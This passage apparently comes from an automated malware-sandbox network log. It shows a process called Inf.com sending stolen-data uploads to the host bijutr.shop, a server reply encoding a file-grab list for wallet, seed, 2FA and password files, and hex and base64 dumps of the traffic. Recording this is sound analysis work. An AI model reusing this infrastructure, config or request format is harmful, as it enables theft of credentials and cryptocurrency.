                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:45 UTC5446OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 30 31 3a 34 32 2e 39 37 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 30 62 33 31 66 37 35 39 2d 61 66 38 39 2d 34 65 35 65 2d 61 62 65 39 2d 36 66 65 66 61 38 64 39 38 65 64 34 22 2c 22 65 70 6f 63 68 22 3a 22 31 38 33 30 38 30 35 39 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T06:01:42.976Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"locale
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:46 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=97709b01ebd5422fa6fac08d66cb2a91&HASH=9770&LV=202412&V=4&LU=1735279305968; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:45 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=22180eb56e4d4903b3e6b11d4a1f1afe; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:45 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2991
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:45 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  39192.168.2.550026188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:45 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IMYUKNY5XBIE37Q9R1VS
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:45 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4d 59 55 4b 4e 59 35 58 42 49 45 33 37 51 39 52 31 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 59 55 4b 4e 59 35 58 42 49 45 33 37 51 39 52 31 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 59 55 4b 4e 59 35 58 42 49 45 33 37 51 39 52 31 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------IMYUKNY5XBIE37Q9R1VSContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------IMYUKNY5XBIE37Q9R1VSContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------IMYUKNY5XBIE37Q9R1VSCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:46 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:46 UTC2208INData Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                                  Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  40192.168.2.55002713.89.178.274432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:46 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279303519&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 5594
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:46 UTC5594OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 30 31 3a 34 33 2e 35 31 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 36 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 30 62 33 31 66 37 35 39 2d 61 66 38 39 2d 34 65 35 65 2d 61 62 65 39 2d 36 66 65 66 61 38 64 39 38 65 64 34 22 2c 22 65 70 6f 63 68 22 3a 22 31 38 33 30 38 30 35 39 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-27T06:01:43.519Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":6,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"loc
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:46 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=8f6591586c864b30b59bbde5480e1d9d&HASH=8f65&LV=202412&V=4&LU=1735279306442; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=d44a88b21c334abebcc94e1742b99682; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2923
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:46 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  41192.168.2.550034188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:48 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----58GD2V3OZMO8YMOZCJ5X
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 7009
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:48 UTC7009OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 47 44 32 56 33 4f 5a 4d 4f 38 59 4d 4f 5a 43 4a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 44 32 56 33 4f 5a 4d 4f 38 59 4d 4f 5a 43 4a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 44 32 56 33 4f 5a 4d 4f 38 59 4d 4f 5a 43 4a 35 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------58GD2V3OZMO8YMOZCJ5XContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------58GD2V3OZMO8YMOZCJ5XContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------58GD2V3OZMO8YMOZCJ5XCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:49 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  42192.168.2.550040188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:50 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----USR1N7QIEU37YUAS2V3W
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 117961
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:50 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------USR1N7QIEU37YUAS2V3WCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:50 UTC16355OUTData Raw: 61 36 2f 76 2f 2f 2f 34 76 4c 36 42 4d 4c 41 41 42 57 2f 33 58 34 36 50 72 2b 2f 2f 2b 44 78 41 69 4c 52 66 52 66 58 6c 75 4c 35 56 33 44 69 30 55 49 67 54 68 6a 63 32 33 67 64 54 69 44 50 61 41 58 53 67 41 41 64 43 39 6f 6f 42 64 4b 41 4f 67 50 37 51 45 41 67 38 51 45 68 63 42 30 47 34 73 31 6f 42 64 4b 41 49 76 4f 61 67 48 2f 64 51 6a 2f 46 5a 54 59 53 51 44 2f 31 6f 74 31 38 49 50 45 43 49 74 46 43 49 74 4e 44 49 76 51 36 4a 51 4b 41 41 43 4c 52 51 77 35 65 41 78 30 45 6d 67 55 30 45 77 41 56 6f 76 58 69 38 6a 6f 6d 51 6f 41 41 49 74 46 44 46 62 2f 64 66 69 4a 57 41 7a 6f 65 76 37 2f 2f 34 74 4e 37 49 50 45 43 49 76 57 69 30 6b 49 36 45 49 4b 41 41 44 4d 56 59 76 73 55 56 46 54 69 31 30 4d 56 6f 74 31 46 46 65 4c 41 34 74 49 45 49 74 34 44 49 6c 4e 2b
                                                                                                                                                                                                                                                                                                  Data Ascii: a6/v///4vL6BMLAABW/3X46Pr+//+DxAiLRfRfXluL5V3Di0UIgThjc23gdTiDPaAXSgAAdC9ooBdKAOgP7QEAg8QEhcB0G4s1oBdKAIvOagH/dQj/FZTYSQD/1ot18IPECItFCItNDIvQ6JQKAACLRQw5eAx0EmgU0EwAVovXi8jomQoAAItFDFb/dfiJWAzoev7//4tN7IPECIvWi0kI6EIKAADMVYvsUVFTi10MVot1FFeLA4tIEIt4DIlN+
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:50 UTC16355OUTData Raw: 56 42 32 5a 6a 76 79 44 34 4b 39 41 41 41 41 6a 55 49 4b 5a 6a 76 77 44 34 49 59 2f 2f 2f 2f 6a 56 42 32 5a 6a 76 79 44 34 4b 6c 41 41 41 41 6a 55 49 4b 5a 6a 76 77 44 34 49 41 2f 2f 2f 2f 75 6c 41 4f 41 41 42 6d 4f 2f 49 50 67 6f 73 41 41 41 43 4e 51 67 70 6d 4f 2f 41 50 67 75 62 2b 2f 2f 2b 4e 55 48 5a 6d 4f 2f 4a 79 64 34 31 43 43 6d 59 37 38 41 2b 43 30 76 37 2f 2f 34 50 43 55 47 59 37 38 6e 4a 6a 67 38 42 51 5a 6a 76 77 44 34 4b 2b 2f 76 2f 2f 75 6b 41 51 41 41 42 6d 4f 2f 4a 79 54 59 31 43 43 6d 59 37 38 41 2b 43 71 50 37 2f 2f 37 72 67 46 77 41 41 5a 6a 76 79 63 6a 65 4e 51 67 70 6d 4f 2f 41 50 67 70 4c 2b 2f 2f 2b 44 77 6a 42 6d 4f 2f 4a 79 49 34 50 41 4d 47 59 37 38 48 4d 62 36 58 33 2b 2f 2f 2b 34 47 76 38 41 41 47 59 37 38 41 2b 43 62 2f 37 2f
                                                                                                                                                                                                                                                                                                  Data Ascii: VB2ZjvyD4K9AAAAjUIKZjvwD4IY////jVB2ZjvyD4KlAAAAjUIKZjvwD4IA////ulAOAABmO/IPgosAAACNQgpmO/APgub+//+NUHZmO/Jyd41CCmY78A+C0v7//4PCUGY78nJjg8BQZjvwD4K+/v//ukAQAABmO/JyTY1CCmY78A+CqP7//7rgFwAAZjvycjeNQgpmO/APgpL+//+DwjBmO/JyI4PAMGY78HMb6X3+//+4Gv8AAGY78A+Cb/7/
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:50 UTC16355OUTData Raw: 41 41 41 41 41 49 32 6b 4a 41 41 41 41 41 43 4c 41 62 72 2f 2f 76 35 2b 41 39 43 44 38 50 38 7a 77 6f 50 42 42 4b 6b 41 41 51 47 42 64 4f 69 4c 51 66 79 45 77 48 51 79 68 4f 52 30 4a 4b 6b 41 41 50 38 41 64 42 4f 70 41 41 41 41 2f 33 51 43 36 38 32 4e 51 66 2b 4c 54 43 51 45 4b 38 48 44 6a 55 48 2b 69 30 77 6b 42 43 76 42 77 34 31 42 2f 59 74 4d 4a 41 51 72 77 63 4f 4e 51 66 79 4c 54 43 51 45 4b 38 48 44 69 2f 39 56 69 2b 78 52 6f 62 67 64 54 51 42 58 68 63 41 50 68 59 77 41 41 41 43 4c 66 52 43 46 2f 77 2b 45 6c 41 41 41 41 49 74 56 43 49 58 53 64 52 66 6f 6f 32 51 41 41 4d 63 41 46 67 41 41 41 4f 69 72 6d 51 41 41 75 50 2f 2f 2f 33 2f 72 64 6f 74 4e 44 49 58 4a 64 4f 4a 54 56 6d 70 42 57 32 70 61 58 69 76 52 69 58 58 38 36 77 4e 71 57 6c 34 50 74 77 51
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAI2kJAAAAACLAbr//v5+A9CD8P8zwoPBBKkAAQGBdOiLQfyEwHQyhOR0JKkAAP8AdBOpAAAA/3QC682NQf+LTCQEK8HDjUH+i0wkBCvBw41B/YtMJAQrwcONQfyLTCQEK8HDi/9Vi+xRobgdTQBXhcAPhYwAAACLfRCF/w+ElAAAAItVCIXSdRfoo2QAAMcAFgAAAOirmQAAuP///3/rdotNDIXJdOJTVmpBW2paXivRiXX86wNqWl4PtwQ
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:50 UTC16355OUTData Raw: 62 44 34 54 43 41 41 41 41 4d 38 6b 7a 39 6f 76 48 39 36 53 31 6b 50 72 2f 2f 77 50 42 69 59 53 31 6b 50 72 2f 2f 34 50 53 41 45 61 4c 79 6a 76 7a 64 65 53 46 79 51 2b 45 6a 67 41 41 41 49 75 46 6a 50 72 2f 2f 34 50 34 63 33 4e 5a 69 59 79 46 6b 50 72 2f 2f 34 75 64 6a 50 72 2f 2f 30 4f 4a 6e 59 7a 36 2f 2f 2f 72 63 7a 50 41 55 49 6d 46 37 50 62 2f 2f 34 6d 46 6a 50 72 2f 2f 34 32 46 38 50 62 2f 2f 31 43 4e 68 5a 44 36 2f 2f 39 6f 7a 41 45 41 41 46 44 6f 63 68 45 41 41 49 50 45 45 44 4c 41 36 53 7a 2f 2f 2f 2b 44 70 62 7a 34 2f 2f 38 41 67 36 57 4d 2b 76 2f 2f 41 47 6f 41 36 77 38 7a 77 46 43 4a 68 59 7a 36 2f 2f 2b 4a 68 62 7a 34 2f 2f 2b 4e 68 63 44 34 2f 2f 39 51 6a 59 57 51 2b 76 2f 2f 61 4d 77 42 41 41 42 51 36 43 38 52 41 41 43 44 78 42 43 4c 6e 59
                                                                                                                                                                                                                                                                                                  Data Ascii: bD4TCAAAAM8kz9ovH96S1kPr//wPBiYS1kPr//4PSAEaLyjvzdeSFyQ+EjgAAAIuFjPr//4P4c3NZiYyFkPr//4udjPr//0OJnYz6///rczPAUImF7Pb//4mFjPr//42F8Pb//1CNhZD6//9ozAEAAFDochEAAIPEEDLA6Sz///+Dpbz4//8Ag6WM+v//AGoA6w8zwFCJhYz6//+Jhbz4//+NhcD4//9QjYWQ+v//aMwBAABQ6C8RAACDxBCLnY
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:50 UTC16355OUTData Raw: 58 53 66 42 64 2f 42 7a 33 2f 2f 2f 39 2f 64 67 37 6f 54 67 55 41 41 4d 63 41 46 67 41 41 41 49 50 49 2f 31 33 44 69 2f 39 56 69 2b 79 44 37 42 43 44 66 51 67 41 64 52 72 6f 4d 41 55 41 41 4d 63 41 46 67 41 41 41 4f 67 34 4f 67 41 41 67 38 6a 2f 43 39 44 70 61 51 45 41 41 46 62 2f 64 51 6a 6f 6a 75 76 2f 2f 31 6d 4c 54 51 69 4c 38 44 50 41 4f 55 45 49 66 51 4f 4a 51 51 68 54 56 32 6f 42 55 46 42 57 36 44 61 6d 41 41 43 4c 32 6f 50 45 45 49 76 34 69 58 33 34 68 64 74 2f 44 67 2b 4d 37 41 41 41 41 49 58 2f 44 34 4c 6b 41 41 41 41 69 30 55 49 69 30 41 4d 71 4d 42 31 46 49 74 46 43 49 74 41 43 4a 6b 72 2b 49 76 48 47 39 71 4c 30 2b 6b 48 41 51 41 41 69 38 61 44 35 6a 2f 42 2b 41 5a 72 7a 6a 43 4a 52 66 53 4c 42 49 58 6f 48 30 30 41 69 55 33 77 69 6b 51 42 4b
                                                                                                                                                                                                                                                                                                  Data Ascii: XSfBd/Bz3///9/dg7oTgUAAMcAFgAAAIPI/13Di/9Vi+yD7BCDfQgAdRroMAUAAMcAFgAAAOg4OgAAg8j/C9DpaQEAAFb/dQjojuv//1mLTQiL8DPAOUEIfQOJQQhTV2oBUFBW6DamAACL2oPEEIv4iX34hdt/Dg+M7AAAAIX/D4LkAAAAi0UIi0AMqMB1FItFCItACJkr+IvHG9qL0+kHAQAAi8aD5j/B+AZrzjCJRfSLBIXoH00AiU3wikQBK
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:50 UTC16355OUTData Raw: 41 41 41 55 2b 68 63 44 41 41 41 67 38 51 4d 67 38 63 45 4f 52 39 31 71 7a 50 41 58 6c 74 66 77 31 62 6f 52 67 77 41 41 46 6d 44 79 50 2f 72 38 49 76 2f 56 59 76 73 55 61 45 55 30 45 77 41 4d 38 57 4a 52 66 78 57 69 2f 46 58 6a 58 34 45 36 78 47 4c 54 51 68 57 2f 78 57 55 32 45 6b 41 2f 31 55 49 57 59 50 47 42 44 76 33 64 65 75 4c 54 66 78 66 4d 38 31 65 36 4d 72 73 2f 76 2b 4c 35 56 33 43 42 41 43 4c 2f 31 57 4c 37 49 74 46 43 49 73 41 4f 77 57 51 48 55 30 41 64 41 64 51 36 50 72 2b 2f 2f 39 5a 58 63 4f 4c 2f 31 57 4c 37 49 74 46 43 49 73 41 4f 77 57 4d 48 55 30 41 64 41 64 51 36 4e 2f 2b 2f 2f 39 5a 58 63 50 70 4d 50 7a 2f 2f 32 67 34 49 55 4d 41 75 59 51 64 54 51 44 6f 64 76 2f 2f 2f 32 68 54 49 55 4d 41 75 59 67 64 54 51 44 6f 5a 2f 2f 2f 2f 2f 38 31
